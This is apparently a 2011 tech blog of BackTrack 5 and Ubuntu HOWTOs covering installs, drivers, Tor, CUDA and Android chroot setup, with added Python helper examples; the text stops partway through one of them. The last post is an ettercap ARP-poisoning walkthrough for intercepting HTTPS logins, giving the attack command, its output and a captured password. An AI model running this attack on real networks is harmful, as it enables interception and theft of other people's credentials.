Saturday, July 30, 2011

HOWTO : Yet Another Update script for Back|Track 5

Maxfx at Back|Track Linux developed a script, written in Python, for updating Back|Track 5. You can update Back|Track 5 and its applications with one script.

The current version is 0.6 at the time of this writing.

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar

tar -vxf bt5up.tar

Usage :

./bt5up.py

You can also move the executable to /bin or /usr/bin. Once it is there, you can run the script as follows :

bt5up.py

Source :

Yet Another Update script on Back|Track 5 forum

Remarks :

Another update script written in C

That's all! See you.

Sunday, July 24, 2011

HOWTO : Register to OSVDB and Nessus on Back|Track 5

PART I : OSVDB

Go to http://osvdb.org to register your account and you will receive an email to activate your account.

After activating your account, you can log in to OSVDB. Go to "Account" -- "API" to copy the API code.

Open a terminal, issue the following command :

nano /pentest/enumeration/web/cms-explorer/osvdb.key

Paste the API code into the osvdb.key file.

PART II : Nessus

Go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and select "Using Nessus at Home?" to register.

You will receive an email. Follow the instructions in the email: open a terminal and issue the command :

/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX

To create a user :

/opt/nessus/sbin/nessus-adduser

** You can leave the rule field empty.

Start Nessus from the Back|Track 5 menu, "BackTrack" -- "Vulnerability Assessment" -- "Vulnerability Scanners" -- "Nessus" -- "nessus start".

Or, just issue the following command :

/etc/init.d/nessusd start

After that, go to https://localhost:8834/

That's all! See you.

HOWTO : Solve Wireshark not loading on Back|Track 5

Back|Track 5 comes with Wireshark 1.6.1 as at July 24, 2011 (GMT +8). However, it does not load properly because a file, "libwsutil.so.0", is missing.

Therefore, we need to compile the latest SVN version of Wireshark from source. The current SVN version is 1.7.0-SVN-38173 at the time of this writing.

Step 1 :

Go to http://www.wireshark.org/download/automated/src/ to get the latest version of Wireshark. The latest version at the time of this writing is 1.7.0-SVN-38173.

*** Please note that the latest version as at July 25, 2011 is 1.7.0-SVN-38202.

apt-get update
apt-get install libtool flex libgtk2.0-dev lua50
apt-get install dpatch libc-ares-dev docbook-xsl libpcre3-dev libcap-dev libgnutls-dev libkrb5-dev liblua5.1-0-dev libsmi2-dev libgeoip-dev xsltproc automake1.9


Step 2 :

apt-get --purge remove wireshark

** You do not need to remove the previous Wireshark; leaving it in place keeps the menu entry unchanged.

Step 3 :

tar -xvjf wireshark-1.7.0-SVN-<LATEST_VERSION>.tar.bz2

cd wireshark-1.7.0-SVN-<LATEST_VERSION>

Step 4 :

./autogen.sh
./configure
make debian-package


Step 5 :

cd ..

If you installed 64-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_amd64.deb wireshark_1.7.0_amd64.deb tshark_1.7.0_amd64.deb

OR

If you installed 32-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_i386.deb wireshark_1.7.0_i386.deb tshark_1.7.0_i386.deb

Step 6 :

/usr/bin/wireshark

That's all! See you.

Friday, July 15, 2011

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

The Lenovo ThinkPad X100e (Type 3508-65B) is equipped with an AMD Athlon Neo MV-40 CPU and a Radeon display card. Back|Track 5 does not work properly on it.

This tutorial is going to show you how to install Back|Track 5 on the captioned hardware.

Step 1 :

Boot the Live CD or Live USB. Select the first item. Press the "Tab" key and add the following to the end of the boot line displayed on the screen.

radeon.modeset=0

Step 2 :

After the Live CD or Live USB has booted, open a terminal and issue the following command.

nano /etc/default/grub

Locate :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791"

Make it read as :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791 radeon.modeset=0"

Save and exit.

Step 3 :

update-grub
fix-splash
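The edit in Steps 2 and 3 is a one-line change, but it is easy to get wrong on a machine where the line already carries the parameter, carries it with a different value, or is missing altogether. This added Python example (not code from the original post) makes the change idempotently on the text of /etc/default/grub; the function names and the sample file contents are my own, and after writing the real file you still have to run update-grub.

```python
import re

# Constructed fragment of /etc/default/grub mirroring the line the post edits.
SAMPLE_GRUB = """GRUB_DEFAULT=0
GRUB_TIMEOUT=10
GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791"
GRUB_CMDLINE_LINUX=""
"""

# Only the ..._DEFAULT line; [ \t]* (not \s*) so the newline is never eaten.
_LINE_RE = re.compile(r'^(GRUB_CMDLINE_LINUX_DEFAULT=)"(.*)"[ \t]*$', re.M)


def add_kernel_param(grub_text: str, param: str) -> str:
    """Return grub_text with `param` in GRUB_CMDLINE_LINUX_DEFAULT.

    Idempotent: a token already present is not duplicated, a `key=value`
    with the same key but a different value is replaced, and a file that
    lacks the variable altogether gets it appended.
    """
    key = param.split("=", 1)[0]
    m = _LINE_RE.search(grub_text)
    if m is None:
        sep = "" if grub_text.endswith("\n") or not grub_text else "\n"
        return f'{grub_text}{sep}GRUB_CMDLINE_LINUX_DEFAULT="{param}"\n'
    tokens = m.group(2).split()
    kept = [t for t in tokens if t.split("=", 1)[0] != key]
    kept.append(param)
    new_line = f'{m.group(1)}"{" ".join(kept)}"'
    return grub_text[:m.start()] + new_line + grub_text[m.end():]


def kernel_params(grub_text: str) -> list:
    """Tokens currently in GRUB_CMDLINE_LINUX_DEFAULT (empty list if unset)."""
    m = _LINE_RE.search(grub_text)
    return m.group(2).split() if m else []


if __name__ == "__main__":
    # Real use: read /etc/default/grub, apply, write back, then run update-grub.
    print(add_kernel_param(SAMPLE_GRUB, "radeon.modeset=0"))
```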

Step 4 :

Configure the wireless card.

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

Step 5 :

Install the AMD Catalyst 11.6 proprietary driver.

Go to the AMD official site and download the AMD Catalyst 11.6 Proprietary Linux x86 Display Driver, released on June 15, 2011.

wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-6-x86.x86_64.run
chmod +x ati-driver-installer-11-6-x86.x86_64.run
./ati-driver-installer-11-6-x86.x86_64.run


** My Back|Track 5 is 64-bit, so I downloaded the 64-bit version of the driver.

Follow the instructions on the screen to install the driver. After the installation, you should reboot your system.

Before rebooting your system, issue the following command :

fix-splash

Step 6 :

Install Pointing Device Settings for the TrackPoint system.

apt-get install gpointing-device-settings

Go to "System" -- "Preferences" -- "Pointing Devices".

Select "TPPS/2 IBM TrackPoint". Choose "Use middle button emulation" and "Use wheel emulation". Select "2" for the button.

That's all! See you.

HOWTO : Adobe Flash 10.3 on Back|Track 5

Step 1 :

Go to the Flash official site to download the current version (tar.gz). It is 10.3.181.34 at the time of this writing.

Step 2 :

Close all running Firefox windows.

Extract the file "install_flash_player_10_linux.tar.gz".

tar -xvzf install_flash_player_10_linux.tar.gz

Step 3 :

Move "libflashplayer.so" to its location.

chown root:root libflashplayer.so
chmod 0644 libflashplayer.so
mv -f libflashplayer.so /usr/lib/mozilla/plugins/
ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/


Step 4 :

Delete the extracted files and directories.

rm -R usr

Source :

Backtrack 5 - How to get flash player working on Gnome / KDE x64

That's all! See you.

Thursday, July 14, 2011

HOWTO : Update script for Back|Track 5

Sickness at Back|Track Linux developed a script for updating Back|Track 5. You can update Back|Track 5 and its applications with one script.

The current version is 0.6 at the time of this writing.

wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c
gcc -o backtrack5_update backtrack5_update.c


Usage :

./backtrack5_update

You can also move the executable to /bin. Once it is there, you can run the script as follows :

backtrack5_update

Source :

Update script on Back|Track 5 forum

Remarks :

Another update script written in Python

That's all! See you.

HOWTO : FeedingBottle 3.2 on Back|Track 5

FeedingBottle is a graphical user interface (GUI) for Aircrack-ng and is a project of Beini. Beini is a wireless network security testing system based on Tiny Core Linux.

FeedingBottle can handle WEP, WPA, WPA2 as well as hidden SSID.

FeedingBottle 3.2 works well on Back|Track 5. You can download it here. Extract and install it with the following commands.

wget http://www.ibeini.com/beini_system/others/feedingbottle/feedingbottle3.2-backtrack5-gnome.zip
unzip feedingbottle3.2-backtrack5-gnome.zip
dpkg -i feedingbottle3.2-backtrack5-gnome.deb


After the installation, you can find it at "Applications" -- "BackTrack" -- "Exploitation Tools" -- "Wireless Exploitation Tools" -- "WLAN Exploitation" -- "FeedingBottle3.2".

For usage, please visit the official site here.

There are simple and advanced modes for you to use.

That's all! See you.

Monday, July 11, 2011

HOWTO : The Onion Router (Tor) on Back|Track 5

PART I : Browser

Step 1 :

nano /etc/apt/sources.list

Append the following line to the file.

deb http://deb.torproject.org/torproject.org lucid main

Step 2 :

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

apt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy


Step 3 :

nano /etc/privoxy/config

Append the following line :

forward-socks4a / 127.0.0.1:9050 .

/etc/init.d/privoxy start
/etc/init.d/tor start


Step 3a (Optional) :

If you are behind a firewall, NAT or a router, you should also append the following line to the config file.

forward 192.168.*.*/ .

Step 4 :

Go to the Tor official site to download and install Torbutton for Firefox.

Tor Button Plugin for Firefox

Step 5 :

Open Firefox. Go to "Tools" -- "Add-ons" -- "Extensions". Select "Torbutton's Preferences".

(a) At "Proxy Settings", untick "Use Polipo".
(b) At "Security Settings", under "On browser startup, set Tor state to:", select "Tor".
(c) At "Display Settings", select "Icon".

** Now Firefox will enable Tor on every launch unless you disable Torbutton in Firefox.

Step 6 (Optional) :

To check whether it works, go to one of the following sites to check your IP address.

http://cmyip.com

or

http://whatismyip.com

or

http://check.torproject.org

PART II : Console

Step a :

apt-get install proxychains elinks

Step b :

nano /etc/proxychains.conf

Append the following line :

socks4 127.0.0.1 9050

** It should already be there.

Step c :

Usage :

proxychains nmap google.com
proxychains elinks http://cmyip.com
proxychains elinks http://www.whatismyip.com


To see your real IP address :

elinks cmyip.com

That's all! See you.

HOWTO : Lenovo Active Protection System (HDAPS) on Ubuntu 11.04

HDAPS protects the hard drive of your laptop (Lenovo ThinkPad) from damage when the laptop is moved around.

Step 1 :

sudo apt-get update
sudo apt-get install tp-smapi-dkms hdapsd


Step 2 :

echo 'tp_smapi' | sudo tee -a /etc/modules
echo 'hdapsd' | sudo tee -a /etc/modules


Step 3 :

sudo modprobe tp_smapi
sudo /etc/init.d/hdapsd restart


** You only need to do Step 1 to Step 3 once.

Step 4 :

To test whether hdapsd is working, issue one of the following commands :

(a)
sudo find /

Then move your laptop and see whether it halts.

(b)
sudo hdapsd

Then move your laptop and see whether it displays "parking".

Step 5 (Optional) :

You can adjust the sensitivity of the sensor by editing the following :

sudo nano /etc/default/hdapsd

Locate "SENSITIVITY" and adjust the value.

That's all! See you.

Sunday, July 03, 2011

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

I wrote a tutorial for Back|Track 5 on Dell Streak 5 with StreakDroid here. Today, I would like to show you how to use SimpleStreak instead of StreakDroid.

Why use SimpleStreak? Because SimpleStreak uses the official ROM with the StreakDroid kernel. It has fewer bugs than StreakDroid. Furthermore, SimpleStreak is faster than StreakDroid.

The current version of SimpleStreak is 1.2 at the time of this writing. You can download it here.

PART I - INSTALLATION OF SIMPLESTREAK

Step 1 :

First of all, you should make sure you have flashed StreakMod Recovery. You can download it (MultiRecoveryFlasher.v0.7.rar at the time of this writing) here.

Step 2 :

Download SimpleStreak 1.2 here.

Rename it to update.zip and copy it to the root directory of the SD Card of your Streak.

Step 3 :

Switch off your Streak. Long press "Vol Up" + "Vol Down" and then press "Power on". Hold those keys until the screen boots into recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing the "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to go to the next menu.

Press "Vol Up" or "Vol Down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing the "Camera button", one by one.

After that, press "Vol Up" or "Vol Down" to move the cursor. Select "sdcard:update.zip" by pressing the "Camera button". Then choose "Install".

Upon seeing "Installation Completed", press the "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes a longer time. Please be patient.

Step 4 :

Install the following apps from the Market for running Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Mocha VNC Lite by MochaSoft

** Steps 1 to 4 only need to be done ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Download the official Back|Track 5 ARM from the official site. Extract it and copy "busybox" and "installbusybox.sh" to the root directory of the SD card.

Open the Android Terminal Emulator and then execute

su
sh installbusybox.sh


** This step only needs to be done ONCE, unless your ROM is reflashed or updated.

Step 6 :

Since the original ARM image of Back|Track 5 is larger than 4GB, it cannot be copied to the SD card. You should download a resized version developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003

Step 7 :

Double click "bt.7z.001" to extract it. You will then see the following files after extraction.

bt
bt.img
startbt
stopbt
installbt.sh


Create a directory (folder) named "bt" in the root directory of the SD card.

Copy these files to "/sdcard/bt".

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

su
cd /sdcard/bt
sh installbt.sh


** This step only needs to be done ONCE, unless your ROM is reflashed or updated.

Step 9 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

su
startbt
bt


Then you will drop into the Back|Track shell.

Step 10 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 11 :

Press "Home" on your Streak and then run the app "Mocha VNC Lite".

Name : BackTrack (or bt for short)
Address : localhost
Port : 5901
Password : 12345678


Then, press "Connect". You will see the Back|Track 5 launched.

** The Mocha VNC Lite settings will be remembered, so you only need to type them ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 12 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** This stops the VNC server.

Then exit the Terminal Emulator, restart it and run the following commands :

su
stopbt


Now Back|Track 5 has stopped running.

Step 13 :

To launch Back|Track next time, repeat Steps 9 to 11. To stop Back|Track, repeat Step 12.

Source :

BACKTRACK 5 on Xperia X10 chroot

Streak - MultiRecoveryFlasher

The method of resizing the Back|Track 5 image to 3.3GB

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) aircrack-ng cannot be run properly, as the interface is eth0 instead of wlan0. There is no monitor mode and no injection.

(3) Download MultiRecoveryFlasher from the Source above. Then flash "StreakMod-Recovery" if you cannot flash SimpleStreak. Under Ubuntu you are not required to install any driver, but you need to run the program as root. Become root with the following command :

sudo -sH

That's all! See you.

Saturday, July 02, 2011

Does Snort really protect your network?

Before watching the video below, which was prepared by T0X1C, I always thought that Snort was powerful and protective. Now I know that Snort cannot protect your network from being hacked by skilled hackers.

Enjoy!

Pissing on Snort with Metasploit from T0X1C on Vimeo.

Wednesday, June 01, 2011

HOWTO : Back|Track 5 on Dell Streak 5

First of all, you should root your Dell Streak 5. I have tried many methods to root my Dell Streak 5 without success. Those methods require a Windows system and some require an app. I nearly bricked my Streak. Fortunately, I re-flashed the recovery image and rescued my Streak.

Now I would like to show you how to root your Streak by installing a custom ROM, StreakDroid, which is developed by DJ Steve. The current StreakDroid is 2.0.0 and is based on stock ROM 2.3.3. However, this version has some bugs (please see Known Issues below). Therefore, I use the previous version, 1.9.0, which is based on stock ROM 2.2.2, instead. Version 1.9.0 is more stable than 2.0.0.

Installing a custom ROM is the easiest way to root. If you do so, your Streak cannot be unrooted and the warranty will be voided. The ROM will be StreakDroid 2.0.0 or 1.9.0, depending on your choice.

Installing Back|Track 5 does not harm your Streak, as it uses VNC to load the Back|Track 5 image.

PART I - INSTALL CUSTOM ROM TO DELL STREAK

Step 1 :

Download StreakDroid 2.0.0.
wget http://mirror2.streakdroid.com/StreakDroid5-2.0.zip

OR

Download StreakDroid 1.9.0.
wget http://downloads.streakdroid.com/djsteve/update-1.9.0.zip

Rename it to update.zip and copy it to the SD card of your Streak.

Step 2 :

Switch off your Streak. Long press "Vol Up" + "Vol Down" and then press "Power on". Hold those keys until the screen boots into recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing the "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to go to the next menu.

Press "Vol Up" or "Vol Down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing the "Camera button", one by one.

After that, press "Vol Up" or "Vol Down" to move the cursor. Select "sdcard:update.zip" by pressing the "Camera button". Then choose "Install".

Upon seeing "Installation Completed", press the "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes a longer time. Please be patient.

Step 3 (Optional) :

You can now install the following apps from the Market.

(1) sysctl config
(2) chainfire3D
(3) Plugins for chainfire3D - (don't extract the .zip) install it and select nNvidia
(4) Remote Desktop by Kolakowski Damian

Step 4 :

Install the following apps from the Market for running Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Android-VNC-Viewer by androidVNC team + antlersoft
Or, (3) Mocha VNC Lite by MochaSoft

** Steps 1 to 4 only need to be done ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Since the original ARM image of Back|Track 5 is larger than 4GB, it cannot be copied to the SD card. You should download a resized version developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003
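Both Dell Streak posts list MD5 sums for the three archive parts but never show the check itself. As an added example (not the author's code), this Python snippet parses md5sum-format lines and verifies files against them, in memory and on disk; the function names are my own and the demo sums and contents are constructed here from published test vectors so it runs offline. A matching sum only shows the download equals what was published next to it, and MD5 is no longer collision resistant, so treat this as a corruption check rather than proof that the image is trustworthy.

```python
import hashlib
import os

# The sums printed in the post for the split archive, in md5sum's own format.
PAGE_MD5SUMS = """\
558ecb1f0e5feb1da86526df8761e6cc  bt.7z.001
247842fd0d3ebb39454f76f4704d1537  bt.7z.002
f74d2f744434a7182b13287d9f8165e7  bt.7z.003
"""

HEX = set("0123456789abcdef")


def parse_md5sum(text: str) -> dict:
    """Parse '<32 hex> <name>' lines into {name: digest}; tolerate md5sum's
    two-space or '*' (binary mode) separators, blank lines and '#' comments."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        digest = digest.lower()
        name = name.lstrip(" *")
        if len(digest) != 32 or not set(digest) <= HEX or not name:
            raise ValueError(f"malformed md5sum line: {raw!r}")
        expected[name] = digest
    return expected


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def md5_file(path: str, chunk: int = 1 << 20) -> str:
    """Hash a file in 1 MiB chunks so a multi-GB image is never read whole."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify(expected: dict, digest_of) -> dict:
    """Compare each listed name with digest_of(name), which returns None for
    a missing file. Result: {name: 'ok' | 'MISMATCH' | 'MISSING'}."""
    report = {}
    for name, want in expected.items():
        got = digest_of(name)
        report[name] = "MISSING" if got is None else ("ok" if got == want else "MISMATCH")
    return report


def verify_bytes(sums_text: str, files: dict) -> dict:
    """Verify in-memory contents ({name: bytes}) against an md5sum listing."""
    return verify(parse_md5sum(sums_text),
                  lambda n: md5_hex(files[n]) if n in files else None)


def verify_dir(sums_text: str, directory: str) -> dict:
    """Verify files on disk, e.g. verify_dir(PAGE_MD5SUMS, "/sdcard/bt")."""
    def digest_of(name):
        path = os.path.join(directory, name)
        return md5_file(path) if os.path.isfile(path) else None
    return verify(parse_md5sum(sums_text), digest_of)


def all_ok(report: dict) -> bool:
    return bool(report) and all(v == "ok" for v in report.values())


# Constructed demo: digests of well-known MD5 test vectors, one part corrupted.
DEMO_SUMS = """\
900150983cd24fb0d6963f7d28e17f72  part.001
9e107d9d372bb6826bd81d3542a419d6 *part.002
d41d8cd98f00b204e9800998ecf8427e  part.003
"""
DEMO_FILES = {
    "part.001": b"abc",
    "part.002": b"The quick brown fox jumps over the lazy dog",
    "part.003": b"not the empty file the listing expects",
}

if __name__ == "__main__":
    for name, status in verify_bytes(DEMO_SUMS, DEMO_FILES).items():
        print(f"{status:8} {name}")
```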

Step 6 :

Double click "bt.7z.001" to extract it. You will then see the following files after extraction.

bt
bt.img
startbt
stopbt
installbt.sh


Create a directory (folder) named "bt" in the root directory of the SD card.

Copy these files to "/sdcard/bt".

Step 7 :

Run the following commands on the Terminal Emulator on your Streak.

su
cd /sdcard/bt
sh installbt.sh


** This step only needs to be done ONCE, unless your ROM is reflashed or updated.

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

startbt
bt


Then you will drop into the Back|Track shell.

Step 9 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 10 :

Press "Home" on your Streak and then run the app "Android-VNC-Viewer".

Nick : BackTrack (or bt for short)
Address : localhost
Port : 5901
Password : 12345678
Color Format : 24-bit color (4 bpp)
Local mouse pointer : Enable
Force full-screen bitmap : Auto


Then, press "Connect". You will see the Back|Track 5 launched.

** The Android-VNC-Viewer settings will be remembered, so you only need to type them ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 11 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** This stops the VNC server.

Then exit the Terminal Emulator, restart it and run the following command :

stopbt

Now Back|Track 5 has stopped running.

Step 12 :

To launch Back|Track next time, repeat Steps 8 to 10. To stop Back|Track, repeat Step 11.

Source :

xda developers - Dell Streak

BACKTRACK 5 on Xperia X10 chroot

HOWTO : Root the Dell Streak (Updated 2010-Dec-13) -- at your own risk

Streak - MultiRecoveryFlasher

The method of resizing the Back|Track 5 image to 3.3GB

Known issues :

StreakDroid 2.0.0 -
Since the Dell Streak will reboot or reset itself every hour or 1.5 hours, please install an app named "Super Task Killer" by OPDA Team and make it run automatically when the Streak starts up. Set it to kill the background apps at a half-hour interval. That MAY solve the problem mentioned.

StreakDroid 1.9.0 -
The Android keyboard malfunctions; use Swype instead.

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) aircrack-ng cannot be run properly, as the interface is eth0 instead of wlan0. There is no monitor mode and no injection.

(3) SecManiac.com stated that an app named "ASTRO file manager" can extract the BackTrack 5 ARM image to a FAT32-formatted SD card flawlessly. However, I have not tested it.

(4) Download MultiRecoveryFlasher from the Source above. Then flash "StreakMod-Recovery" if you cannot flash StreakDroid. Under Ubuntu you are not required to install any driver, but you need to run the program as root. Become root with the following command :

sudo -sH

That's all! See you.

Sunday, May 29, 2011

HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Server

The CUDA Toolkit 4.0 was released in May 2011. If you have an nVidia display card with several CUDA cores, you will be interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Server.

You will experience a faster server after the installation of CUDA Toolkit 4.0.

This HOWTO does not require X to be installed.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Thanks to the developer of the CUDA 4.0 PPA, Aaron Haviland, for his contribution in making the CUDA Toolkit easy to install.

Step 2 :

sudo apt-get update
sudo apt-get upgrade


64-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 3 :

sudo nano /etc/init.d/nvidia_cuda

Append the following lines.

============= Copy from here ================
#!/bin/bash

PATH=/sbin:/bin:/usr/bin:$PATH

/sbin/modprobe nvidia

if [ "$?" -eq 0 ]; then

   # Count the number of NVIDIA controllers found.
   N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`
   NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`

   N=`expr $N3D + $NVGA - 1`
   for i in `seq 0 $N`; do
      /bin/mknod -m 666 /dev/nvidia$i c 195 $i;
   done

   /bin/mknod -m 666 /dev/nvidiactl c 195 255

else
   exit 1
fi


=========== Copy to here =================

Step 4 :

sudo chmod +x /etc/init.d/nvidia_cuda
sudo update-rc.d nvidia_cuda defaults

Step 5 :

Reboot your system.

Remarks

I do not have a server with nVidia display cards in hand at the moment, so I am not sure whether the captioned startup script works properly.

That's all! See you.

HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop

The CUDA Toolkit 4.0 was released in May 2011. If you have an nVidia display card with several CUDA cores, you will be interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop.

You will experience a faster desktop after the installation of CUDA Toolkit 4.0. Meanwhile, if you install SMPlayer, you can play back 1080p videos with the help of vdpau.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Thanks to the developer of the CUDA 4.0 PPA, Aaron Haviland, for his contribution in making the CUDA Toolkit easy to install.

Step 2 :

sudo apt-get update
sudo apt-get upgrade


64-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 2a (Optional) :

If you did not have any nVidia driver installed before, or you encounter any problem booting your system, run the following command. Otherwise this step is not required.

sudo nvidia-xconfig

**This step may not be required.

Step 3 :

Reboot your system.

Step 4 (Optional) :

To install SMPlayer.

sudo apt-get install smplayer smplayer-translations smplayer-themes

Then set "Output Driver" to "vdpau" under "Preferences".

Step 5 (Optional) :

Once the CUDA Toolkit and nVidia drivers are installed, you can download the sample code for testing.

sudo apt-get install freeglut3-dev libxi-dev libXmu-dev

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

sudo chmod +x gpucomputingsdk_4.0.17_linux.run
./gpucomputingsdk_4.0.17_linux.run


Accept the default settings.

cd NVIDIA_GPU_computing_SDK/C
make


** Please ignore the warning messages about the unsupported gcc version. They are harmless.

Run the samples.

cd NVIDIA_GPU_computing_SDK/C/bin/linux/release
./deviceQuery
./nbody


That's all! See you.

Saturday, May 28, 2011

HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational purposes only. Do NOT carry out the following steps on a LAN without permission. Otherwise, you will be put in jail. ***

Sniffing SSL (https) traffic on a LAN with ettercap by means of a Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the following change :

[privs]
ec_uid = 0    # nobody is the default
ec_gid = 0    # nobody is the default


Uncomment the following :

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Step 2 :

The victim's machine is at 192.168.1.100, the router is at 192.168.1.1 and the attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The output is as follows :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0... (Ethernet)

eth0 ->    08:00:27:FF:95:DB    192.168.1.115 255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |=================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


Step 3 :

At the victim's machine, open a browser, such as Firefox, and go to GMail. You will be asked to accept an untrusted certificate. Just accept it and you will be directed to the login screen of GMail.

When the victim logs in to GMail, his/her username and password will be logged on the attacker's machine. The output will be similar to the following :

HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

You will find USER: samiux and PASS: password.
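From the defender's side, the "ARP poisoning victims" output in Step 2 leaves two signatures on the LAN: the gateway's IP suddenly resolves to a different MAC, and one MAC answers for more than one IP. This added Python example (not part of the original post) implements that passive check in the style of arpwatch over a constructed trace of ARP replies that reuses the addresses shown above; the ArpReply/ArpMonitor names are my own.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpReply:
    """One ARP reply as a sniffer would record it: which MAC claims which IP."""
    ts: float   # seconds since capture start
    ip: str     # sender protocol address (the IP being claimed)
    mac: str    # sender hardware address (the MAC claiming it)


@dataclass
class ArpMonitor:
    """Passive ARP consistency checker: keeps both directions of the binding."""
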